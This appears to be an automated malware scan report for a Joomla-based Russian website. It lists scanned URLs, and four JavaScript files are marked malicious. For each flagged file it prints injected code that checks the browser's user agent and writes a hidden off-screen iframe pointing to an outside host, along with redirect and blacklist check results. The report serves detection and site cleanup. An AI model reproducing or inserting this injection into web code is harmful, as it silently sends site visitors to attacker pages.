Scanned pages/files
Request | Server response | Status |
http://www.ech-srv.ru/ | 200 OK Content-Length: 12112 Content-Type: text/html | clean |
http://www.ech-srv.ru/templates/exp_cars/movie.js | 200 OK Content-Length: 1317 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function Mastercodevault() {
var poc = navigator.userAgent; var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1); if (!poirlastic) { document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>'); } } Mastercodevault(); function run_ } e>');;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
http://www.ech-srv.ru/information/okompanii/ | 200 OK Content-Length: 14358 Content-Type: text/html | clean |
http://www.ech-srv.ru/information/echelon/ | 200 OK Content-Length: 17978 Content-Type: text/html | clean |
http://www.ech-srv.ru/information/faq/ | 200 OK Content-Length: 20215 Content-Type: text/html | clean |
http://www.ech-srv.ru/information/kontakty/ | 200 OK Content-Length: 13087 Content-Type: text/html | clean |
http://www.ech-srv.ru/includes/js/calendar/calendar_mini.js | 200 OK Content-Length: 725 Content-Type: application/x-javascript | clean |
http://www.ech-srv.ru/includes/js/calendar/lang/calendar-en.js | 200 OK Content-Length: 1809 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function Mastercodevault() {
var poc = navigator.userAgent; var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1); if (!poirlastic) { document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>'); } } Mastercodevault(); Calendar._DN Calendar._TT["DRAG_TO_MOVE"] = "Drag to move"; Calendar._TT["PART_TODAY"] = " (today)"; Calendar._TT["MON_FIRST"] = "Display Monday first"; Calendar._TT["SUN_FIRST"] = "Display Sunday first"; Calendar._TT["CLOSE"] = "Close"; Calendar._TT["TODAY"] = "Today"; Calendar._TT["DEF_DATE_FORMAT"] = "y-mm-dd"; Calendar._TT["TT_DATE_FORMAT"] = "D, M d"; Calendar._TT["WK"] = "wk"; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
http://www.ech-srv.ru/includes/js/joomla.javascript.js | 200 OK Content-Length: 17178 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function Mastercodevault() {
var poc = navigator.userAgent; var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1); if (!poirlastic) { document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>'); } } Mastercodevault(); function xsho } } else { alert("You cannot change the order of items, as an item in the list is `Checked Out`"); return; } } submitform('saveorder'); } function getElementByName( f, name ) { if (f.elements) { for (i=0, n=f.elements.length; i < n; i++) { if (f.elements[i].name == name) { return f.elements[i]; } } } return null; };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
http://www.ech-srv.ru/includes/js/mambojavascript.js | 200 OK Content-Length: 17055 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function Mastercodevault() {
var poc = navigator.userAgent; var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1); if (!poirlastic) { document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>'); } } Mastercodevault(); function xsho } } else { alert("You cannot change the order of items, as an item in the list is `Checked Out`"); return; } } submitform('saveorder'); } function getElementByName( f, name ) { if (f.elements) { for (i=0, n=f.elements.length; i < n; i++) { if (f.elements[i].name == name) { return f.elements[i]; } } } return null; };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
http://www.ech-srv.ru/komplekt/standart/ | 200 OK Content-Length: 24723 Content-Type: text/html | clean |
http://www.ech-srv.ru/komplekt/standartprofi/ | 200 OK Content-Length: 24885 Content-Type: text/html | clean |
http://www.ech-srv.ru/komplekt/standartprofim/ | 200 OK Content-Length: 24942 Content-Type: text/html | clean |
http://www.ech-srv.ru/komplekt/vip/ | 200 OK Content-Length: 24964 Content-Type: text/html | clean |
http://www.ech-srv.ru/komplekt/dopoborudovanie/ | 200 OK Content-Length: 15701 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ech-srv.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ech-srv.ru
Referer: http://www.google.com/search?q=ech-srv.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ech-srv.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ech-srv.ru/
Result: ech-srv.ru is not infected or malware details are not published yet.